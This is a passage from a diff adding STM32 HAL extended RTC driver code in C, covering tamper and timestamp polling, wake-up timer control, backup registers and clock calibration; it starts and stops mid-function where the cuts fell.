2 callback. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +__weak void HAL_RTCEx_Tamper2EventCallback(RTC_HandleTypeDef *hrtc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrtc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_RTC_Tamper2EventCallback could be implemented in the user file + */ +} + +/** + * @brief This function handles TimeStamp polling request. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_PollForTimeStampEvent(RTC_HandleTypeDef *hrtc, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while(__HAL_RTC_TIMESTAMP_GET_FLAG(hrtc, RTC_FLAG_TSF) == RESET) + { + if(__HAL_RTC_TIMESTAMP_GET_FLAG(hrtc, RTC_FLAG_TSOVF) != RESET) + { + /* Clear the TIMESTAMP Overrun Flag */ + __HAL_RTC_TIMESTAMP_CLEAR_FLAG(hrtc, RTC_FLAG_TSOVF); + + /* Change TIMESTAMP state */ + hrtc->State = HAL_RTC_STATE_ERROR; + + return HAL_ERROR; + } + + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + hrtc->State = HAL_RTC_STATE_TIMEOUT; + return HAL_TIMEOUT; + } + } + } + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + return HAL_OK; +} + +/** + * @brief This function handles Tamper1 Polling. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_PollForTamper1Event(RTC_HandleTypeDef *hrtc, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Get the status of the Interrupt */ + while(__HAL_RTC_TAMPER_GET_FLAG(hrtc, RTC_FLAG_TAMP1F)== RESET) + { + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + hrtc->State = HAL_RTC_STATE_TIMEOUT; + return HAL_TIMEOUT; + } + } + } + + /* Clear the Tamper Flag */ + __HAL_RTC_TAMPER_CLEAR_FLAG(hrtc,RTC_FLAG_TAMP1F); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + return HAL_OK; +} + +/** + * @brief This function handles Tamper2 Polling. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_PollForTamper2Event(RTC_HandleTypeDef *hrtc, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Get the status of the Interrupt */ + while(__HAL_RTC_TAMPER_GET_FLAG(hrtc, RTC_FLAG_TAMP2F) == RESET) + { + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + hrtc->State = HAL_RTC_STATE_TIMEOUT; + return HAL_TIMEOUT; + } + } + } + + /* Clear the Tamper Flag */ + __HAL_RTC_TAMPER_CLEAR_FLAG(hrtc,RTC_FLAG_TAMP2F); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup RTCEx_Exported_Functions_Group2 RTC Wake-up functions + * @brief RTC Wake-up functions + * +@verbatim + =============================================================================== + ##### RTC Wake-up functions ##### + =============================================================================== + + [..] This section provides functions allowing to configure Wake-up feature + +@endverbatim + * @{ + */ + +/** + * @brief Sets wake up timer. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param WakeUpCounter Wake up counter + * @param WakeUpClock Wake up clock + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetWakeUpTimer(RTC_HandleTypeDef *hrtc, uint32_t WakeUpCounter, uint32_t WakeUpClock) +{ + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_WAKEUP_CLOCK(WakeUpClock)); + assert_param(IS_RTC_WAKEUP_COUNTER(WakeUpCounter)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /*Check RTC WUTWF flag is reset only when wake up timer enabled*/ + if((hrtc->Instance->CR & RTC_CR_WUTE) != RESET) + { + tickstart = HAL_GetTick(); + + /* Wait till RTC WUTWF flag is reset and if Time out is reached exit */ + while(__HAL_RTC_WAKEUPTIMER_GET_FLAG(hrtc, RTC_FLAG_WUTWF) == SET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + } + + __HAL_RTC_WAKEUPTIMER_DISABLE(hrtc); + + tickstart = HAL_GetTick(); + + /* Wait till RTC WUTWF flag is set and if Time out is reached exit */ + while(__HAL_RTC_WAKEUPTIMER_GET_FLAG(hrtc, RTC_FLAG_WUTWF) == RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + + /* Clear the Wake-up Timer clock source bits in CR register */ + hrtc->Instance->CR &= (uint32_t)~RTC_CR_WUCKSEL; + + /* Configure the clock source */ + hrtc->Instance->CR |= (uint32_t)WakeUpClock; + + /* Configure the Wake-up Timer counter */ + hrtc->Instance->WUTR = (uint32_t)WakeUpCounter; + + /* Enable the Wake-up Timer */ + __HAL_RTC_WAKEUPTIMER_ENABLE(hrtc); + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Sets wake up timer with interrupt + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param WakeUpCounter Wake up counter + * @param WakeUpClock Wake up clock + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetWakeUpTimer_IT(RTC_HandleTypeDef *hrtc, uint32_t WakeUpCounter, uint32_t WakeUpClock) +{ + __IO uint32_t count; + + /* Check the parameters */ + assert_param(IS_RTC_WAKEUP_CLOCK(WakeUpClock)); + assert_param(IS_RTC_WAKEUP_COUNTER(WakeUpCounter)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Check RTC WUTWF flag is reset only when wake up timer enabled */ + if((hrtc->Instance->CR & RTC_CR_WUTE) != RESET) + { + /* Wait till RTC WUTWF flag is reset and if Time out is reached exit */ + count = RTC_TIMEOUT_VALUE * (SystemCoreClock / 32U / 1000U); + do + { + if(count-- == 0U) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + while(__HAL_RTC_WAKEUPTIMER_GET_FLAG(hrtc, RTC_FLAG_WUTWF) == SET); + } + + __HAL_RTC_WAKEUPTIMER_DISABLE(hrtc); + + /* Wait till RTC WUTWF flag is set and if Time out is reached exit */ + count = RTC_TIMEOUT_VALUE * (SystemCoreClock / 32U / 1000U); + do + { + if(count-- == 0U) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + while(__HAL_RTC_WAKEUPTIMER_GET_FLAG(hrtc, RTC_FLAG_WUTWF) == RESET); + + /* Configure the Wake-up Timer counter */ + hrtc->Instance->WUTR = (uint32_t)WakeUpCounter; + + /* Clear the Wake-up Timer clock source bits in CR register */ + hrtc->Instance->CR &= (uint32_t)~RTC_CR_WUCKSEL; + + /* Configure the clock source */ + hrtc->Instance->CR |= (uint32_t)WakeUpClock; + + /* RTC WakeUpTimer Interrupt Configuration: EXTI configuration */ + __HAL_RTC_WAKEUPTIMER_EXTI_ENABLE_IT(); + + EXTI->RTSR |= RTC_EXTI_LINE_WAKEUPTIMER_EVENT; + + /* Clear RTC Wake Up timer Flag */ + __HAL_RTC_WAKEUPTIMER_CLEAR_FLAG(hrtc, RTC_FLAG_WUTF); + + /* Configure the Interrupt in the RTC_CR register */ + __HAL_RTC_WAKEUPTIMER_ENABLE_IT(hrtc,RTC_IT_WUT); + + /* Enable the Wake-up Timer */ + __HAL_RTC_WAKEUPTIMER_ENABLE(hrtc); + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Deactivates wake up timer counter. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +uint32_t HAL_RTCEx_DeactivateWakeUpTimer(RTC_HandleTypeDef *hrtc) +{ + uint32_t tickstart = 0U; + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Disable the Wake-up Timer */ + __HAL_RTC_WAKEUPTIMER_DISABLE(hrtc); + + /* In case of interrupt mode is used, the interrupt source must disabled */ + __HAL_RTC_WAKEUPTIMER_DISABLE_IT(hrtc,RTC_IT_WUT); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till RTC WUTWF flag is set and if Time out is reached exit */ + while(__HAL_RTC_WAKEUPTIMER_GET_FLAG(hrtc, RTC_FLAG_WUTWF) == RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Gets wake up timer counter. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval Counter value + */ +uint32_t HAL_RTCEx_GetWakeUpTimer(RTC_HandleTypeDef *hrtc) +{ + /* Get the counter value */ + return ((uint32_t)(hrtc->Instance->WUTR & RTC_WUTR_WUT)); +} + +/** + * @brief This function handles Wake Up Timer interrupt request. + * @note Unlike alarm interrupt line (shared by AlarmA and AlarmB) and tamper + * interrupt line (shared by timestamp and tampers) wakeup timer + * interrupt line is exclusive to the wakeup timer. + * There is no need in this case to check on the interrupt enable + * status via __HAL_RTC_WAKEUPTIMER_GET_IT_SOURCE(). + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +void HAL_RTCEx_WakeUpTimerIRQHandler(RTC_HandleTypeDef *hrtc) +{ + /* Get the pending status of the WAKEUPTIMER Interrupt */ + if(__HAL_RTC_WAKEUPTIMER_GET_FLAG(hrtc, RTC_FLAG_WUTF) != (uint32_t)RESET) + { + /* WAKEUPTIMER callback */ +#if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) + hrtc->WakeUpTimerEventCallback(hrtc); +#else + HAL_RTCEx_WakeUpTimerEventCallback(hrtc); +#endif /* USE_HAL_RTC_REGISTER_CALLBACKS */ + + /* Clear the WAKEUPTIMER interrupt pending bit */ + __HAL_RTC_WAKEUPTIMER_CLEAR_FLAG(hrtc, RTC_FLAG_WUTF); + } + + /* Clear the EXTI's line Flag for RTC WakeUpTimer */ + __HAL_RTC_WAKEUPTIMER_EXTI_CLEAR_FLAG(); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; +} + +/** + * @brief Wake Up Timer callback. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +__weak void HAL_RTCEx_WakeUpTimerEventCallback(RTC_HandleTypeDef *hrtc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrtc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_RTC_WakeUpTimerEventCallback could be implemented in the user file + */ +} + +/** + * @brief This function handles Wake Up Timer Polling. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_PollForWakeUpTimerEvent(RTC_HandleTypeDef *hrtc, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while(__HAL_RTC_WAKEUPTIMER_GET_FLAG(hrtc, RTC_FLAG_WUTF) == RESET) + { + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + return HAL_TIMEOUT; + } + } + } + + /* Clear the WAKEUPTIMER Flag */ + __HAL_RTC_WAKEUPTIMER_CLEAR_FLAG(hrtc, RTC_FLAG_WUTF); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + return HAL_OK; +} + +/** + * @} + */ + + +/** @defgroup RTCEx_Exported_Functions_Group3 Extension Peripheral Control functions + * @brief Extension Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Extension Peripheral Control functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to + (+) Write a data in a specified RTC Backup data register + (+) Read a data in a specified RTC Backup data register + (+) Set the Coarse calibration parameters. + (+) Deactivate the Coarse calibration parameters + (+) Set the Smooth calibration parameters. + (+) Configure the Synchronization Shift Control Settings. + (+) Configure the Calibration Pinout (RTC_CALIB) Selection (1Hz or 512Hz). + (+) Deactivate the Calibration Pinout (RTC_CALIB) Selection (1Hz or 512Hz). + (+) Enable the RTC reference clock detection. + (+) Disable the RTC reference clock detection. + (+) Enable the Bypass Shadow feature. + (+) Disable the Bypass Shadow feature. + +@endverbatim + * @{ + */ + +/** + * @brief Writes a data in a specified RTC Backup data register. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param BackupRegister RTC Backup data Register number. + * This parameter can be: RTC_BKP_DRx where x can be from 0 to 19 to + * specify the register. + * @param Data Data to be written in the specified RTC Backup data register. + * @retval None + */ +void HAL_RTCEx_BKUPWrite(RTC_HandleTypeDef *hrtc, uint32_t BackupRegister, uint32_t Data) +{ + uint32_t tmp = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_BKP(BackupRegister)); + + tmp = (uint32_t)&(hrtc->Instance->BKP0R); + tmp += (BackupRegister * 4U); + + /* Write the specified register */ + *(__IO uint32_t *)tmp = (uint32_t)Data; +} + +/** + * @brief Reads data from the specified RTC Backup data Register. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param BackupRegister RTC Backup data Register number. + * This parameter can be: RTC_BKP_DRx where x can be from 0 to 19 to + * specify the register. + * @retval Read value + */ +uint32_t HAL_RTCEx_BKUPRead(RTC_HandleTypeDef *hrtc, uint32_t BackupRegister) +{ + uint32_t tmp = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_BKP(BackupRegister)); + + tmp = (uint32_t)&(hrtc->Instance->BKP0R); + tmp += (BackupRegister * 4U); + + /* Read the specified register */ + return (*(__IO uint32_t *)tmp); +} + +/** + * @brief Sets the Coarse calibration parameters. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param CalibSign Specifies the sign of the coarse calibration value. + * This parameter can be one of the following values : + * @arg RTC_CALIBSIGN_POSITIVE: The value sign is positive + * @arg RTC_CALIBSIGN_NEGATIVE: The value sign is negative + * @param Value value of coarse calibration expressed in ppm (coded on 5 bits). + * + * @note This Calibration value should be between 0 and 63 when using negative + * sign with a 2-ppm step. + * + * @note This Calibration value should be between 0 and 126 when using positive + * sign with a 4-ppm step. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetCoarseCalib(RTC_HandleTypeDef* hrtc, uint32_t CalibSign, uint32_t Value) +{ + /* Check the parameters */ + assert_param(IS_RTC_CALIB_SIGN(CalibSign)); + assert_param(IS_RTC_CALIB_VALUE(Value)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set Initialization mode */ + if(RTC_EnterInitMode(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state*/ + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + else + { + /* Enable the Coarse Calibration */ + __HAL_RTC_COARSE_CALIB_ENABLE(hrtc); + + /* Set the coarse calibration value */ + hrtc->Instance->CALIBR = (uint32_t)(CalibSign|Value); + + /* Exit Initialization mode */ + hrtc->Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Deactivates the Coarse calibration parameters. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_DeactivateCoarseCalib(RTC_HandleTypeDef* hrtc) +{ + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set Initialization mode */ + if(RTC_EnterInitMode(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state*/ + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + else + { + /* Enable the Coarse Calibration */ + __HAL_RTC_COARSE_CALIB_DISABLE(hrtc); + + /* Exit Initialization mode */ + hrtc->Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Sets the Smooth calibration parameters. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param SmoothCalibPeriod Select the Smooth Calibration Period. + * This parameter can be can be one of the following values : + * @arg RTC_SMOOTHCALIB_PERIOD_32SEC: The smooth calibration period is 32s. + * @arg RTC_SMOOTHCALIB_PERIOD_16SEC: The smooth calibration period is 16s. + * @arg RTC_SMOOTHCALIB_PERIOD_8SEC: The smooth calibration period is 8s. + * @param SmoothCalibPlusPulses Select to Set or reset the CALP bit. + * This parameter can be one of the following values: + * @arg RTC_SMOOTHCALIB_PLUSPULSES_SET: Add one RTCCLK pulse every 2*11 pulses. + * @arg RTC_SMOOTHCALIB_PLUSPULSES_RESET: No RTCCLK pulses are added. + * @param SmouthCalibMinusPulsesValue Select the value of CALM[80] bits. + * This parameter can be one any value from 0 to 0x000001FF. + * @note To deactivate the smooth calibration, the field SmoothCalibPlusPulses + * must be equal to SMOOTHCALIB_PLUSPULSES_RESET and the field + * SmouthCalibMinusPulsesValue must be equal to 0. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetSmoothCalib(RTC_HandleTypeDef* hrtc, uint32_t SmoothCalibPeriod, uint32_t SmoothCalibPlusPulses, uint32_t SmouthCalibMinusPulsesValue) +{ + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_SMOOTH_CALIB_PERIOD(SmoothCalibPeriod)); + assert_param(IS_RTC_SMOOTH_CALIB_PLUS(SmoothCalibPlusPulses)); + assert_param(IS_RTC_SMOOTH_CALIB_MINUS(SmouthCalibMinusPulsesValue)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* check if a calibration is pending*/ + if((hrtc->Instance->ISR & RTC_ISR_RECALPF) != RESET) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* check if a calibration is pending*/ + while((hrtc->Instance->ISR & RTC_ISR_RECALPF) != RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + } + + /* Configure the Smooth calibration settings */ + hrtc->Instance->CALR = (uint32_t)((uint32_t)SmoothCalibPeriod | (uint32_t)SmoothCalibPlusPulses | (uint32_t)SmouthCalibMinusPulsesValue); + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Configures the Synchronization Shift Control Settings. + * @note When REFCKON is set, firmware must not write to Shift control register. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param ShiftAdd1S Select to add or not 1 second to the time calendar. + * This parameter can be one of the following values : + * @arg RTC_SHIFTADD1S_SET: Add one second to the clock calendar. + * @arg RTC_SHIFTADD1S_RESET: No effect. + * @param ShiftSubFS Select the number of Second Fractions to substitute. + * This parameter can be one any value from 0 to 0x7FFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetSynchroShift(RTC_HandleTypeDef* hrtc, uint32_t ShiftAdd1S, uint32_t ShiftSubFS) +{ + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_SHIFT_ADD1S(ShiftAdd1S)); + assert_param(IS_RTC_SHIFT_SUBFS(ShiftSubFS)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until the shift is completed*/ + while((hrtc->Instance->ISR & RTC_ISR_SHPF) != RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + + /* Check if the reference clock detection is disabled */ + if((hrtc->Instance->CR & RTC_CR_REFCKON) == RESET) + { + /* Configure the Shift settings */ + hrtc->Instance->SHIFTR = (uint32_t)(uint32_t)(ShiftSubFS) | (uint32_t)(ShiftAdd1S); + + /* If RTC_CR_BYPSHAD bit = 0, wait for synchro else this check is not needed */ + if((hrtc->Instance->CR & RTC_CR_BYPSHAD) == RESET) + { + if(HAL_RTC_WaitForSynchro(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + } + } + else + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Configures the Calibration Pinout (RTC_CALIB) Selection (1Hz or 512Hz). + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param CalibOutput Select the Calibration output Selection . + * This parameter can be one of the following values: + * @arg RTC_CALIBOUTPUT_512HZ: A signal has a regular waveform at 512Hz. + * @arg RTC_CALIBOUTPUT_1HZ: A signal has a regular waveform at 1Hz. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetCalibrationOutPut(RTC_HandleTypeDef* hrtc, uint32_t CalibOutput) +{ + /* Check the parameters */ + assert_param(IS_RTC_CALIB_OUTPUT(CalibOutput)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Clear flags before config */ + hrtc->Instance->CR &= (uint32_t)~RTC_CR_COSEL; + + /* Configure the RTC_CR register */ + hrtc->Instance->CR |= (uint32_t)CalibOutput; + + __HAL_RTC_CALIBRATION_OUTPUT_ENABLE(hrtc); + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Deactivates the Calibration Pinout (RTC_CALIB) Selection (1Hz or 512Hz). + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_DeactivateCalibrationOutPut(RTC_HandleTypeDef* hrtc) +{ + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + __HAL_RTC_CALIBRATION_OUTPUT_DISABLE(hrtc); + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Enables the RTC reference clock detection. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetRefClock(RTC_HandleTypeDef* hrtc) +{ + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set Initialization mode */ + if(RTC_EnterInitMode(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state*/ + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + else + { + __HAL_RTC_CLOCKREF_DETECTION_ENABLE(hrtc); + + /* Exit Initialization mode */ + hrtc->Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Disable the RTC reference clock detection. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_DeactivateRefClock(RTC_HandleTypeDef* hrtc) +{ + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set Initialization mode */ + if(RTC_EnterInitMode(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state*/ + hrtc->State = 